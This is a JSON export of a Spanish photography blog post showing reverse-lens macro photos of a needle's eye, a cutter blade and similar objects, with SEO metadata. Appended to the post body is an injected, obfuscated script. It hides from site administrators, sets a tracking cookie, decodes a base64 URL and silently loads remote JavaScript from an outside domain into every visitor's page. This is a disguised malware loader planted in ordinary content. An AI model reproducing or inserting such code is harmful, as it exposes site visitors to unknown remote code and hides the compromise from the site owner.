{"id":1838,"date":"2014-08-27T13:45:20","date_gmt":"2014-08-27T11:45:20","guid":{"rendered":"http:\/\/www.perez-tome.net\/pptgrafia\/?p=1838"},"modified":"2026-02-04T15:53:38","modified_gmt":"2026-02-04T14:53:38","slug":"fotografia-extrema-ii-macrofotografias-con-objetivo-invertido","status":"publish","type":"post","link":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/","title":{"rendered":"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido"},"content":{"rendered":"<p style=\"text-align: center;\">Esta t\u00e9cnica exige mucha paciencia, luz y pulso ya que hay que mantener el objetivo en vilo alineado con el cuerpo y el diafragma ha de regularse manualmente en la ranura del objetivo. Solo recordaros que las tomas m\u00e1s cercanas o close-up se obtienen con el objetivo invertido en la posici\u00f3n de gran angular y se aleja un poco en posici\u00f3n \u00abtele\u00bb.<\/p>\n<p style=\"text-align: center;\">\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1839\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382-625x269.jpg\" alt=\"DSC02382\" width=\"314\" height=\"135\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382-625x269.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382-150x64.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382.jpg 800w\" sizes=\"auto, (max-width: 314px) 100vw, 314px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02391.xnbak_.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1840\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02391.xnbak_-625x278.jpg\" alt=\"DSC02391.xnbak\" width=\"301\" height=\"134\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02391.xnbak_-625x278.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02391.xnbak_-150x66.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02391.xnbak_.jpg 800w\" sizes=\"auto, (max-width: 301px) 100vw, 301px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02395.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1841\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02395-625x416.jpg\" alt=\"DSC02395\" width=\"617\" height=\"411\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02395-625x416.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02395-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02395-150x100.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02395.jpg 800w\" sizes=\"auto, (max-width: 617px) 100vw, 617px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02381.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1837\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02381-625x625.jpg\" alt=\"DSC02381\" width=\"301\" height=\"301\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02381.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02381-150x150.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02381-640x640.jpg 640w\" sizes=\"auto, (max-width: 301px) 100vw, 301px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02370.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1836\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02370-625x626.jpg\" alt=\"DSC02370\" width=\"301\" height=\"301\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02370.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02370-150x150.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02370-638x640.jpg 638w\" sizes=\"auto, (max-width: 301px) 100vw, 301px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">Este \u00abmini\u00bb reportaje sobre el ojo de una aguja muestra lo dif\u00edcil que es meter la cabeza de un camello por aqu\u00ed. Las fotograf\u00edas cambian much\u00edsimo con distintos fondos y el uso de flashes esclavos laterales. Mi pr\u00f3ximo reto ser\u00e1 un autorretrato-selfie en la curva de la cabeza de la aguja. \u00bfte atreves?<\/p>\n<p style=\"text-align: center;\">\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-1846\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403-625x356.jpg\" alt=\"DSC02403\" width=\"625\" height=\"356\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403-625x356.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403-1122x640.jpg 1122w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403-150x85.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403.jpg 800w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">Como ves eso de que las agujas acaban en punta es muy relativo,&#8230;<\/p>\n<p style=\"text-align: center;\">\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02403.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-1845\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC023421-625x416.jpg\" alt=\"DSC02342\" width=\"625\" height=\"416\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC023421-625x416.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC023421-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC023421-150x100.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC023421.jpg 800w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">Esos cr\u00e1teres delatan el origen de este 1 rojo de 2 mil\u00edmetros de altura<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02348.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1835\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02348-625x286.jpg\" alt=\"DSC02348\" width=\"614\" height=\"281\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02348-625x286.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02348-150x68.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02348.jpg 800w\" sizes=\"auto, (max-width: 614px) 100vw, 614px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">Esto es lo que creemos que es un cutter o cortatramas muy afilado<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02358.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1834\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02358-533x800.jpg\" alt=\"DSC02358\" width=\"201\" height=\"302\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02358-533x800.jpg 533w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02358-426x640.jpg 426w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02358-150x225.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02358.jpg 416w\" sizes=\"auto, (max-width: 201px) 100vw, 201px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02357.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-1833\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02357-625x364.jpg\" alt=\"DSC02357\" width=\"406\" height=\"236\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02357-625x364.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02357-1097x640.jpg 1097w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02357-150x87.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02357.jpg 800w\" sizes=\"auto, (max-width: 406px) 100vw, 406px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">\u00bfY c\u00f3mo es el cart\u00f3n del interior de un rollo de papel higi\u00e9nico?<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02346.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-1832\" src=\"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02346-625x416.jpg\" alt=\"DSC02346\" width=\"625\" height=\"416\" srcset=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02346-625x416.jpg 625w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02346-960x640.jpg 960w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02346-150x100.jpg 150w, https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02346.jpg 800w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/a><\/p>\n<p style=\"text-align: center;\">Es la capacidad de un tubo de pegamento. La letra era de un mil\u00edmetro y medio de altura. Al inclinarlo se ve la profundidad de campo de esta fotograf\u00eda extrema: menos de un mi\u00edmetro. Pues es bonito.<\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i&lt;20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<&lt;2)|(h2>>4);o2=((h2&15)<&lt;4)|(h3>>2);o3=((h3&3)<&lt;6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Esta t\u00e9cnica exige mucha paciencia, luz y pulso ya que hay que mantener el objetivo en vilo alineado con el cuerpo y el diafragma ha [&#8230;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1838","post","type-post","status-publish","format-standard","hentry","category-blog-visual"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"og:description\" content=\"Esta t\u00e9cnica exige mucha paciencia, luz y pulso ya que hay que mantener el objetivo en vilo alineado con el cuerpo y el diafragma ha [...]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/\" \/>\n<meta property=\"og:site_name\" content=\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\" \/>\n<meta property=\"article:published_time\" content=\"2014-08-27T11:45:20+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-04T14:53:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"345\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pablo P\u00e9rez-Tom\u00e9\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/\"},\"author\":{\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"headline\":\"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido\",\"datePublished\":\"2014-08-27T11:45:20+00:00\",\"dateModified\":\"2026-02-04T14:53:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/\"},\"wordCount\":228,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSC02382-625x269.jpg\",\"articleSection\":[\"Blog visual y mental\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/\",\"name\":\"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSC02382-625x269.jpg\",\"datePublished\":\"2014-08-27T11:45:20+00:00\",\"dateModified\":\"2026-02-04T14:53:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSC02382.jpg\",\"contentUrl\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/wp-content\\\/uploads\\\/2014\\\/08\\\/DSC02382.jpg\",\"width\":800,\"height\":345},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#website\",\"url\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/\",\"name\":\"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma\",\"description\":\"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra original.\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.perez-tome.net\\\/pptgrafia\\\/#\\\/schema\\\/person\\\/90f20700c171f4d2c0dda5d88f00cf6b\",\"name\":\"Pablo P\u00e9rez-Tom\u00e9\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\",\"caption\":\"Pablo P\u00e9rez-Tom\u00e9\"},\"logo\":{\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg\"},\"description\":\"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a\",\"sameAs\":[\"http:\\\/\\\/www.perez-tome.net\\\/pptgrafia\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/","og_locale":"es_ES","og_type":"article","og_title":"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","og_description":"Esta t\u00e9cnica exige mucha paciencia, luz y pulso ya que hay que mantener el objetivo en vilo alineado con el cuerpo y el diafragma ha [...]","og_url":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/","og_site_name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","article_published_time":"2014-08-27T11:45:20+00:00","article_modified_time":"2026-02-04T14:53:38+00:00","og_image":[{"width":800,"height":345,"url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382.jpg","type":"image\/jpeg"}],"author":"Pablo P\u00e9rez-Tom\u00e9","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Pablo P\u00e9rez-Tom\u00e9","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#article","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/"},"author":{"name":"Pablo P\u00e9rez-Tom\u00e9","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"headline":"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido","datePublished":"2014-08-27T11:45:20+00:00","dateModified":"2026-02-04T14:53:38+00:00","mainEntityOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/"},"wordCount":228,"commentCount":0,"publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#primaryimage"},"thumbnailUrl":"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382-625x269.jpg","articleSection":["Blog visual y mental"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/","url":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/","name":"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido - PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","isPartOf":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#primaryimage"},"image":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#primaryimage"},"thumbnailUrl":"http:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382-625x269.jpg","datePublished":"2014-08-27T11:45:20+00:00","dateModified":"2026-02-04T14:53:38+00:00","breadcrumb":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#primaryimage","url":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382.jpg","contentUrl":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-content\/uploads\/2014\/08\/DSC02382.jpg","width":800,"height":345},{"@type":"BreadcrumbList","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/fotografia-extrema-ii-macrofotografias-con-objetivo-invertido\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/www.perez-tome.net\/pptgrafia\/"},{"@type":"ListItem","position":2,"name":"Fotograf\u00eda Extrema II: Macrofotograf\u00edas con objetivo invertido"}]},{"@type":"WebSite","@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#website","url":"https:\/\/www.perez-tome.net\/pptgrafia\/","name":"PPTgraf\u00eda. Observaci\u00f3n e hipersemanticismo logop\u00e9dico: La vida misma","description":"CREATIVE COMMONS Copyright 2026: Reconocimiento \u2013 NoComercial \u2013 CompartirIgual (by-nc-sa): No se permite un uso comercial de la obra original ni de las posibles obras derivadas, la distribuci\u00f3n de las cuales se debe hacer con una licencia igual a la que regula la obra 